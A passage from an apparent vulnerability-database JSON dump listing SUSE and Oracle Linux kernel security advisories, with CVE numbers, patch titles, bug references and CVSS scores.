bsc#966328).\n - scsi: return correct blkprep status code in case scsi_init_io() fails\n (bsc#1082979).\n - scsi: sim710: fix build warning (bnc#1012382).\n - scsi: sr: workaround VMware ESXi cdrom emulation bug (bsc#1080813).\n - scsi: storvsc: Fix scsi_cmd error assignments in storvsc_handle_error\n (bnc#1012382).\n - scsi: sun_esp: fix device reference leaks (bsc#1082979).\n - scsi: ufs: ufshcd: fix potential NULL pointer dereference in\n ufshcd_config_vreg (bnc#1012382).\n - sctp: make use of pre-calculated len (bnc#1012382).\n - selinux: ensure the context is NUL terminated in\n security_context_to_sid_core() (bnc#1012382).\n - selinux: general protection fault in sock_has_perm (bnc#1012382).\n - selinux: skip bounded transition processing if the policy isn't loaded\n (bnc#1012382).\n - serial: 8250_mid: fix broken DMA dependency (bnc#1012382).\n - serial: 8250_uniphier: fix error return code in uniphier_uart_probe()\n (bsc#1031717).\n - serial: imx: Only wakeup via RTSDEN bit if the system has RTS/CTS\n (bnc#1012382).\n - sget(): handle failures of register_shrinker() (bnc#1012382).\n - signal/openrisc: Fix do_unaligned_access to send the proper signal\n (bnc#1012382).\n - signal/sh: Ensure si_signo is initialized in do_divide_error\n (bnc#1012382).\n - SolutionEngine771x: fix Ether platform data (bnc#1012382).\n - spi: atmel: fixed spin_lock usage inside atmel_spi_remove (bnc#1012382).\n - spi: imx: do not access registers while clocks disabled (bnc#1012382).\n - spi: sun4i: disable clocks in the remove function (bnc#1012382).\n - ssb: mark ssb_bus_register as __maybe_unused (bnc#1012382).\n - staging: android: ashmem: Fix a race condition in pin ioctls\n (bnc#1012382).\n - staging: iio: adc: ad7192: fix external frequency setting (bnc#1012382).\n - staging: rtl8188eu: Fix incorrect response to SIOCGIWESSID (bnc#1012382).\n - staging: ste_rmi4: avoid unused function warnings (bnc#1012382).\n - staging: unisys: visorinput depends on INPUT (bnc#1012382).\n - 
staging: wilc1000: fix kbuild test robot error (bnc#1012382).\n - SUNRPC: Allow connect to return EHOSTUNREACH (bnc#1012382).\n - tc1100-wmi: fix build warning when CONFIG_PM not enabled (bnc#1012382).\n - tc358743: fix register i2c_rd/wr function fix (git-fixes).\n - tc358743: fix register i2c_rd/wr functions (bnc#1012382).\n - tcp: do not set rtt_min to 1 (bsc#1042286).\n - tcp: release sk_frag.page in tcp_disconnect (bnc#1012382).\n - test_bpf: fix the dummy skb after dissector changes (bsc#1042286).\n - tg3: Add workaround to restrict 5762 MRRS to 2048 (bnc#1012382).\n - tg3: Enable PHY reset in MTU change path for 5720 (bnc#1012382).\n - thermal: fix INTEL_SOC_DTS_IOSF_CORE dependencies (bnc#1012382).\n - thermal: spear: use __maybe_unused for PM functions (bnc#1012382).\n - tlan: avoid unused label with PCI=n (bnc#1012382).\n - tools build: Add tools tree support for 'make -s' (bnc#1012382).\n - tty: cyclades: cyz_interrupt is only used for PCI (bnc#1012382).\n - tty: hvc_xen: hide xen_console_remove when unused (bnc#1012382).\n - tty: mxser: Remove ASYNC_CLOSING (bnc#1072363).\n - ubi: block: Fix locking for idr_alloc/idr_remove (bnc#1012382).\n - udp: restore UDPlite many-cast delivery (bsc#1042286).\n - usb: build drivers/usb/common/ when USB_SUPPORT is set (bnc#1012382).\n - USB: cdc-acm: Do not log urb submission errors on disconnect\n (bnc#1012382).\n - USB: cdc_subset: only build when one driver is enabled (bnc#1012382).\n - usb: dwc3: gadget: Set maxpacket size for ep0 IN (bnc#1012382).\n - usb: f_fs: Prevent gadget unbind if it is already unbound (bnc#1012382).\n - usb: gadget: do not dereference g until after it has been null checked\n (bnc#1012382).\n - usb: gadget: f_fs: Process all descriptors during bind (bnc#1012382).\n - usb: gadget: uvc: Missing files for configfs interface (bnc#1012382).\n - usbip: fix 3eee23c3ec14 tcp_socket address still in the status file\n (bnc#1012382).\n - usbip: keep usbip_device sockfd state in sync with tcp_socket\n 
(bnc#1012382).\n - usbip: list: do not list devices attached to vhci_hcd (bnc#1012382).\n - usbip: prevent bind loops on devices attached to vhci_hcd (bnc#1012382).\n - usbip: vhci_hcd: clear just the USB_PORT_STAT_POWER bit (bnc#1012382).\n - usb: ldusb: add PIDs for new CASSY devices supported by this driver\n (bnc#1012382).\n - usb: musb/ux500: remove duplicate check for dma_is_compatible\n (bnc#1012382).\n - usb: ohci: Proper handling of ed_rm_list to handle race condition\n between usb_kill_urb() and finish_unlinks() (bnc#1012382).\n - usb: option: Add support for FS040U modem (bnc#1012382).\n - usb: phy: msm add regulator dependency (bnc#1012382).\n - usb: renesas_usbhs: missed the "running" flag in usb_dmac with rx path\n (bnc#1012382).\n - USB: serial: io_edgeport: fix possible sleep-in-atomic (bnc#1012382).\n - USB: serial: pl2303: new device id for Chilitag (bnc#1012382).\n - USB: serial: simple: add Motorola Tetra driver (bnc#1012382).\n - usb: uas: unconditionally bring back host after reset (bnc#1012382).\n - v4l: remove MEDIA_TUNER dependency for VIDEO_TUNER (bnc#1012382).\n - vb2: V4L2_BUF_FLAG_DONE is set after DQBUF (bnc#1012382).\n - vfs: do not do RCU lookup of empty pathnames (bnc#1012382).\n - vhost_net: stop device during reset owner (bnc#1012382).\n - video: fbdev: atmel_lcdfb: fix display-timings lookup (bnc#1012382).\n - video: fbdev/mmp: add MODULE_LICENSE (bnc#1012382).\n - video: fbdev: sis: remove unused variable (bnc#1012382).\n - video: fbdev: via: remove possibly unused variables (bnc#1012382).\n - video: Use bool instead int pointer for get_opt_bool() argument\n (bnc#1012382).\n - virtio_balloon: prevent uninitialized variable use (bnc#1012382).\n - vlan: Check for vlan ethernet types for 8021.q or 802.1ad (bsc#1042286).\n - vmxnet3: prevent building with 64K pages (bnc#1012382).\n - vxlan: consolidate csum flag handling (bsc#1042286).\n - vxlan: consolidate output route calculation (bsc#1042286).\n - vxlan: consolidate 
vxlan_xmit_skb and vxlan6_xmit_skb (bsc#1042286).\n - vxlan: do not allow overwrite of config src addr (bsc#1042286).\n - watchdog: imx2_wdt: restore previous timeout after suspend+resume\n (bnc#1012382).\n - wireless: cw1200: use __maybe_unused to hide pm functions_ (bnc#1012382).\n - x86: add MULTIUSER dependency for KVM (bnc#1012382).\n - x86/asm: Fix inline asm call constraints for GCC 4.4 (bnc#1012382).\n - x86/boot: Avoid warning for zero-filling .bss (bnc#1012382).\n - x86: bpf_jit: small optimization in emit_bpf_tail_call() (bnc#1012382).\n - x86/bugs: Drop one "mitigation" from dmesg (bnc#1012382).\n - x86/build: Silence the build with "make -s" (bnc#1012382).\n - x86/cpu/bugs: Make retpoline module warning conditional (bnc#1012382).\n - x86/cpu: Change type of x86_cache_size variable to unsigned int\n (bnc#1012382).\n - x86/entry/64: Separate cpu_current_top_of_stack from TSS.sp0\n (bsc#1077560).\n - x86/entry/64: Use a per-CPU trampoline stack for IDT entries\n (bsc#1077560).\n - x86: fix build warnign with 32-bit PAE (bnc#1012382).\n - x86/fpu/math-emu: Fix possible uninitialized variable use (bnc#1012382).\n - x86/kaiser: fix build error with KASAN && !FUNCTION_GRAPH_TRACER\n (bnc#1012382).\n - x86/kvm/vmx: do not use vm-exit instruction length for fast MMIO when\n running nested (bsc#1081431).\n - x86/mce: Pin the timer when modifying (bsc#1080851,1076282).\n - x86/microcode/AMD: Change load_microcode_amd()'s param to bool to fix\n preemptibility bug (bnc#1012382).\n - x86/microcode/AMD: Do not load when running on a hypervisor\n (bnc#1012382).\n - x86/microcode: Do the family check first (bnc#1012382).\n - x86/mm/kmmio: Fix mmiotrace for page unaligned addresses (bnc#1012382).\n - x86/nospec: Fix header guards names (bnc#1012382).\n - x86/oprofile: Fix bogus GCC-8 warning in nmi_setup() (bnc#1012382).\n - x86/paravirt: Remove 'noreplace-paravirt' cmdline option (bnc#1012382).\n - x86/platform: Add PCI dependency for PUNIT_ATOM_DEBUG (bnc#1012382).\n 
- x86/platform/olpc: Fix resume handler build warning (bnc#1012382).\n - x86/pti: Make unpoison of pgd for trusted boot work for real\n (bnc#1012382).\n - x86/ras/inject: Make it depend on X86_LOCAL_APIC=y (bnc#1012382).\n - x86/retpoline: Avoid retpolines for built-in __init functions\n (bnc#1012382).\n - x86/retpoline: Remove the esp/rsp thunk (bnc#1012382).\n - x86/spectre: Check CONFIG_RETPOLINE in command line parser (bnc#1012382).\n - x86/spectre: Fix an error message (git-fixes).\n - x86/spectre: Fix spelling mistake: "vunerable"-> "vulnerable"\n (bnc#1012382).\n - x86/spectre: Remove the out-of-tree RSB stuffing\n - x86/spectre: Simplify spectre_v2 command line parsing (bnc#1012382).\n - x86/speculation: Fix typo IBRS_ATT, which should be IBRS_ALL\n (bnc#1012382).\n - x86/xen: Zero MSR_IA32_SPEC_CTRL before suspend (bnc#1065600).\n - xen/gntdev: Fix off-by-one error when unmapping with holes (bnc#1012382).\n - xen/gntdev: Fix partial gntdev_mmap() cleanup (bnc#1012382).\n - xen-netfront: enable device after manual module load (bnc#1012382).\n - xen-netfront: remove warning when unloading module (bnc#1012382).\n - xen: XEN_acpi_PROCESSOR is Dom0-only (bnc#1012382).\n - xfrm: check id proto in validate_tmpl() (bnc#1012382).\n - xfrm: Fix stack-out-of-bounds read on socket policy lookup (bnc#1012382).\n - xfrm: Fix stack-out-of-bounds with misconfigured transport mode policies\n (bnc#1012382).\n - xfrm_user: propagate sec ctx allocation errors (bsc#1042286).\n - xfs: do not chain ioends during writepage submission (bsc#1077285\n bsc#1043441).\n - xfs: factor mapping out of xfs_do_writepage (bsc#1077285 bsc#1043441).\n - xfs: Introduce writeback context for writepages (bsc#1077285\n bsc#1043441).\n - xfs: ioends require logically contiguous file offsets (bsc#1077285\n bsc#1043441).\n - xfs: quota: check result of register_shrinker() (bnc#1012382).\n - xfs: quota: fix missed destroy of qi_tree_lock (bnc#1012382).\n - xfs: reinit btree pointer on attr tree 
inactivation walk (bsc#1078787).\n - xfs: remove nonblocking mode from xfs_vm_writepage (bsc#1077285\n bsc#1043441).\n - xfs: remove racy hasattr check from attr ops (bsc#1035432).\n - xfs: remove xfs_cancel_ioend (bsc#1077285 bsc#1043441).\n - xfs: stop searching for free slots in an inode chunk when there are none\n (bsc#1072739).\n - xfs: toggle readonly state around xfs_log_mount_finish (bsc#1073401).\n - xfs: ubsan fixes (bnc#1012382).\n - xfs: validate sb_logsunit is a multiple of the fs blocksize\n (bsc#1077513).\n - xfs: write unmount record for ro mounts (bsc#1073401).\n - xfs: xfs_cluster_write is redundant (bsc#1077285 bsc#1043441).\n - xtensa: fix futex_atomic_cmpxchg_inatomic (bnc#1012382).\n\n", "edition": 1, "modified": "2018-03-23T18:08:51", "published": "2018-03-23T18:08:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-03/msg00055.html", "id": "SUSE-SU-2018:0785-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3139", "CVE-2019-11190", "CVE-2016-1583", "CVE-2017-13305", "CVE-2017-16650", "CVE-2018-19985"], "description": "kernel-uek\n[3.8.13-118.34.1]\n- Input: wacom - move the USB (now hid) Wacom driver in drivers/hid (Benjamin Tissoires) [Orabug: 25512494] {CVE-2016-3139}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215229] {CVE-2017-16650}\n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605987] {CVE-2018-19985} {CVE-2018-19985}\n- KEYS: encrypted: fix buffer overread in valid_master_desc() (Eric Biggers) [Orabug: 29605993] {CVE-2017-13305}\n- ecryptfs: don't allow mmap when the lower fs doesn't support it (Jeff Mahoney) [Orabug: 29666607] {CVE-2016-1583} {CVE-2016-1583}\n- Revert 'ecryptfs: forbid opening files without mmap 
handler' (Brian Maly) [Orabug: 29666607] {CVE-2016-1583}\n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677234] {CVE-2019-11190}", "edition": 3, "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "ELSA-2019-4644", "href": "http://linux.oracle.com/errata/ELSA-2019-4644.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9191", "CVE-2017-15649", "CVE-2017-16527", "CVE-2017-12192", "CVE-2017-16650", "CVE-2017-2618", "CVE-2017-1000405", "CVE-2017-12190"], "description": "[4.1.12-103.10.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200879] {CVE-2017-1000405}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044692] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069038] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069038] {CVE-2017-12190}\n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069065] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069065] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069065] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069065] {CVE-2017-15649}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215225] 
{CVE-2017-16650}\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148276] {CVE-2017-16527}\n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187217] \n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 27126129] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119628] \n- ocfs2: code clean up for direct io (Ryan Ding) \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27076919] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27062498] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27062498] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27062498] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27062498] \n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns 
(Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]", "edition": 4, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3651", "href": "http://linux.oracle.com/errata/ELSA-2017-3651.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T00:41:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-10639", "CVE-2019-19062", "CVE-2020-10732", "CVE-2019-19535", "CVE-2019-10638", "CVE-2017-16644", "CVE-2019-20811", "CVE-2019-19049"], "description": "[4.1.12-124.42.3]\n- can: peak_usb: pcan_usb_fd: Fix info-leaks to USB devices (Tomas Bortoli) [Orabug: 31351221] {CVE-2019-19535}\n- media: hdpvr: Fix an error handling path in hdpvr_probe() (Arvind Yadav) [Orabug: 31352053] {CVE-2017-16644}\n- fs/binfmt_misc.c: do not allow offset overflow (Thadeu Lima de Souza Cascardo) [Orabug: 31588258] \n- clear inode and truncate pages before enqueuing for async inactivation (Gautham Ananthakrishna) [Orabug: 31744270]\n[4.1.12-124.42.2]\n- mm: create alloc_last_chance debugfs entries (Mike Kravetz) [Orabug: 31295499] \n- mm: perform 'last chance' reclaim efforts before allocation failure (Mike Kravetz) [Orabug: 31295499] \n- 
mm: let page allocation slowpath retry 'order' times (Mike Kravetz) [Orabug: 31295499] \n- fix kABI breakage from 'netns: provide pure entropy for net_hash_mix()' (Dan Duval) [Orabug: 31351904] {CVE-2019-10638} {CVE-2019-10639}\n- netns: provide pure entropy for net_hash_mix() (Eric Dumazet) [Orabug: 31351904] {CVE-2019-10638} {CVE-2019-10639}\n- hrtimer: Annotate lockless access to timer->base (Eric Dumazet) [Orabug: 31380495] \n- rds: ib: Revert 'net/rds: Avoid stalled connection due to CM REQ retries' (Hakon Bugge) [Orabug: 31648141] \n- rds: Clear reconnect pending bit (Hakon Bugge) [Orabug: 31648141] \n- RDMA/netlink: Do not always generate an ACK for some netlink operations (Hakon Bugge) [Orabug: 31666975] \n- genirq/proc: Return proper error code when irq_set_affinity() fails (Wen Yaxng) [Orabug: 31723450]\n[4.1.12-124.42.1]\n- fs/binfmt_elf.c: allocate initialized memory in fill_thread_core_info() (Alexander Potapenko) [Orabug: 31350639] {CVE-2020-10732}\n- crypto: user - fix memory leak in crypto_report (Navid Emamdoost) [Orabug: 31351640] {CVE-2019-19062}\n- of: unittest: fix memory leak in unittest_data_add (Navid Emamdoost) [Orabug: 31351702] {CVE-2019-19049}\n- IB/sa: Resolv use-after-free in ib_nl_make_request() (Divya Indi) [Orabug: 31656992] \n- net-sysfs: call dev_hold if kobject_init_and_add success (YueHaibing) [Orabug: 31687545] {CVE-2019-20811}", "edition": 2, "modified": "2020-09-03T00:00:00", "published": "2020-09-03T00:00:00", "id": "ELSA-2020-5837", "href": "http://linux.oracle.com/errata/ELSA-2020-5837.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:40", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15299", "CVE-2017-17741", "CVE-2017-15129", "CVE-2017-7294", "CVE-2017-16994", "CVE-2017-17448", "CVE-2018-5332", "CVE-2017-15116", "CVE-2017-17449"], "description": "[4.1.12-124.15.1]\n- netfilter: 
nfnetlink_cthelper: Add missing permission checks (Kevin Cernekee) [Orabug: 27260771] {CVE-2017-17448}\n- netlink: Add netns check on taps (Kevin Cernekee) [Orabug: 27260799] {CVE-2017-17449}\n- KVM: Fix stack-out-of-bounds read in write_mmio (Wanpeng Li) [Orabug: 27290606] {CVE-2017-17741} {CVE-2017-17741}\n- xprtrdma: Detect unreachable NFS/RDMA servers more reliably (Chuck Lever) [Orabug: 27587008] \n- sunrpc: Export xprt_force_disconnect() (Chuck Lever) [Orabug: 27587008] \n- sunrpc: Allow xprt->ops->timer method to sleep (Chuck Lever) [Orabug: 27587008] \n- KVM: nVMX: fix guest CR4 loading when emulating L2 to L1 exit (Haozhong Zhang) [Orabug: 27720128] \n- x86/microcode: probe CPU features on microcode update (Ankur Arora) [Orabug: 27878230] \n- x86/microcode: microcode_write() should not reference boot_cpu_data (Ankur Arora) [Orabug: 27878230] \n- x86/cpufeatures: use cpu_data in init_scattered_cpuid_flags() (Ankur Arora) [Orabug: 27878230] \n- mm/pagewalk.c: report holes in hugetlb ranges (Jann Horn) [Orabug: 27913118] {CVE-2017-16994}\n- KEYS: dont let add_key() update an uninstantiated key (David Howells) [Orabug: 27913330] {CVE-2017-15299}\n- drm/vmwgfx: NULL pointer dereference in vmw_surface_define_ioctl() (Murray McAllister) [Orabug: 27913367] {CVE-2017-7294}\n- vmscan: Support multiple kswapd threads per node (Buddy Lumpkin) [Orabug: 27913411] \n- tcp: dont use F-RTO on non-recurring timeouts (Yuchung Cheng) [Orabug: 27901860] \n- net/rds: ib: Release correct number of frags (Hakon Bugge) [Orabug: 27924161] \n- crypto: rng - Remove old low-level rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- crypto: drbg - Convert to new rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- crypto: ansi_cprng - Convert to new rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- crypto: krng - Convert to new rng interface (Herbert Xu) [Orabug: 27926676] {CVE-2017-15116}\n- RDS: Heap OOB write in rds_message_alloc_sgs() 
(Mohamed Ghannam) [Orabug: 27934066] {CVE-2018-5332}\n- net: Fix double free and memory corruption in get_net_ns_by_id() (Eric W. Biederman) [Orabug: 27934789] {CVE-2017-15129}", "edition": 4, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "ELSA-2018-4108", "href": "http://linux.oracle.com/errata/ELSA-2018-4108.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-16527", "CVE-2018-100199", "CVE-2017-16526", "CVE-2017-16533", "CVE-2017-5715", "CVE-2017-16536", "CVE-2017-15868"], "description": "[2.6.39-400.298.6]\n- perf/hwbp: Simplify the perf-hwbp code, fix documentation (Linus Torvalds) [Orabug: 27947612] {CVE-2018-100199}\n[2.6.39-400.298.5]\n- xen-netfront: fix rx stall when req_prod_pvt goes back to more than zero again (Dongli Zhang) [Orabug: 25053376] \n- x86/IBRS: Remove support for IBRS_ENABLED_USER mode (Boris Ostrovsky) [Orabug: 27430615] \n- x86/microcode/intel: Disable late loading on model 79 (Borislav Petkov) [Orabug: 27343579]\n[2.6.39-400.298.4]\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148283] {CVE-2017-16527}\n- uwb: properly check kthread_run return value (Andrey Konovalov) [Orabug: 27206900] {CVE-2017-16526}\n- HID: usbhid: fix out-of-bounds bug (Jaejoong Kim) [Orabug: 27207935] {CVE-2017-16533}\n- cx231xx-cards: fix NULL-deref on missing association descriptor (Johan Hovold) [Orabug: 27208080] {CVE-2017-16536}\n- net: cdc_ether: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215206] {CVE-2017-16649}\n- Bluetooth: bnep: bnep_add_connection() should verify that its dealing with l2cap socket (Al Viro) [Orabug: 27344787] {CVE-2017-15868}\n- Bluetooth: hidp: verify l2cap sockets (David Herrmann) [Orabug: 27344787] {CVE-2017-15868}\n- ALSA: pcm: prevent UAF in 
snd_pcm_info (Robb Glasser) [Orabug: 27344840] {CVE-2017-0861} {CVE-2017-0861}\n- Addendum: x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27516441] \n- x86/cpufeature: Add X86_FEATURE_IA32_ARCH_CAPS and X86_FEATURE_IBRS_ATT (David Woodhouse) [Orabug: 27649498] {CVE-2017-5715}\n- x86/cpufeatures: Clean up Spectre v2 related CPUID flags (David Woodhouse) [Orabug: 27649510] {CVE-2017-5715}\n- x86/spectre: Now that we expose 'stbibp' make sure it is correct. (Konrad Rzeszutek Wilk) [Orabug: 27649631] {CVE-2017-5715}\n- x86/speculation: Add basic IBPB (Indirect Branch Prediction Barrier) support (KarimAllah Ahmed) [Orabug: 27649640] {CVE-2017-5715}\n- x86: Add STIBP feature enumeration (David Woodhouse) [Orabug: 27649693] {CVE-2017-5715}\n- x86/cpu/AMD: Add speculative control support for AMD (Tom Lendacky) [Orabug: 27649706] {CVE-2017-5715}\n- x86/spectre_v2: Dont spam the console with these: (Konrad Rzeszutek Wilk) [Orabug: 27649723] {CVE-2017-5715}\n- x86/spectre_v2: Remove 0xc2 from spectre_bad_microcodes (Darren Kenny) [Orabug: 27600848] \n- Revert 'x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation' (Konrad Rzeszutek Wilk) [Orabug: 27601773] \n- x86/syscall: run syscall exit code with extra registers cleared (Alexandre Chartre) [Orabug: 27501176] \n- x86/syscall: run syscall-specific code with extra registers cleared (Alexandre Chartre) [Orabug: 27501176] \n- x86/syscall: run syscall entry code with extra registers cleared (Alexandre Chartre) [Orabug: 27501176] \n- x86/spectre: Drop the warning about ibrs being obsolete (Konrad Rzeszutek Wilk) [Orabug: 27518974] \n- x86: Include linux/device.h in bugs_64.c (Boris Ostrovsky) [Orabug: 27519044] \n- x86: fix mitigation details of UEK2 spectre v1 (Konrad Rzeszutek Wilk) [Orabug: 27509909] \n- x86/cpufeature: Blacklist SPEC_CTRL/PRED_CMD on early Spectre v2 microcodes (David Woodhouse) [Orabug: 27516441] {CVE-2017-5715}\n- x86, 
intel: Output microcode revision in /proc/cpuinfo (Andi Kleen) [Orabug: 27516441] \n- x86: intel-family.h: Add GEMINI_LAKE SOC (Len Brown) [Orabug: 27516441] \n- x86/cpu/intel: Introduce macros for Intel family numbers (Dave Hansen) [Orabug: 27516441] \n- x86/mitigation/spectre_v2: Add reporting of 'lfence' (Konrad Rzeszutek Wilk) [Orabug: 27525958] \n- x86/spec: Add 'lfence_enabled' in sysfs (Konrad Rzeszutek Wilk) [Orabug: 27525954] \n- x86/spec_ctrl: Add 'nolfence' knob to disable fallback for spectre_v2 mitigation (Konrad Rzeszutek Wilk) [Orabug: 27525923] \n- x86/spec: Also print IBRS if IBPB is disabled (Konrad Rzeszutek Wilk) [Orabug: 27519083] \n- x86: Use Indirect Branch Prediction Barrier in context switch (Tim Chen) [Orabug: 27516378]", "edition": 4, "modified": "2018-05-01T00:00:00", "published": "2018-05-01T00:00:00", "id": "ELSA-2018-4088", "href": "http://linux.oracle.com/errata/ELSA-2018-4088.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0861", "CVE-2017-16649", "CVE-2017-16527", "CVE-2017-15115", "CVE-2017-14140", "CVE-2018-100199", "CVE-2017-16533", "CVE-2017-5715", "CVE-2017-16536", "CVE-2017-15868"], "description": "kernel-uek\n[3.8.13-118.20.6]\n- perf/hwbp: Simplify the perf-hwbp code, fix documentation (Linus Torvalds) [Orabug: 27947608] {CVE-2018-100199}\n[3.8.13-118.20.5]\n- x86/microcode: probe CPU features on microcode update (Ankur Arora) [Orabug: 27806667] \n- x86/microcode: microcode_write() should not reference boot_cpu_data (Ankur Arora) [Orabug: 27806667] \n- x86/cpufeatures: use cpu_data in init_scattered_cpuid_flags() (Ankur Arora) [Orabug: 27806667]\n[3.8.13-118.20.4]\n- Drivers: hv: fcopy: set .owner reference for file operations (Joe Jin) [Orabug: 21191022] \n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148281] 
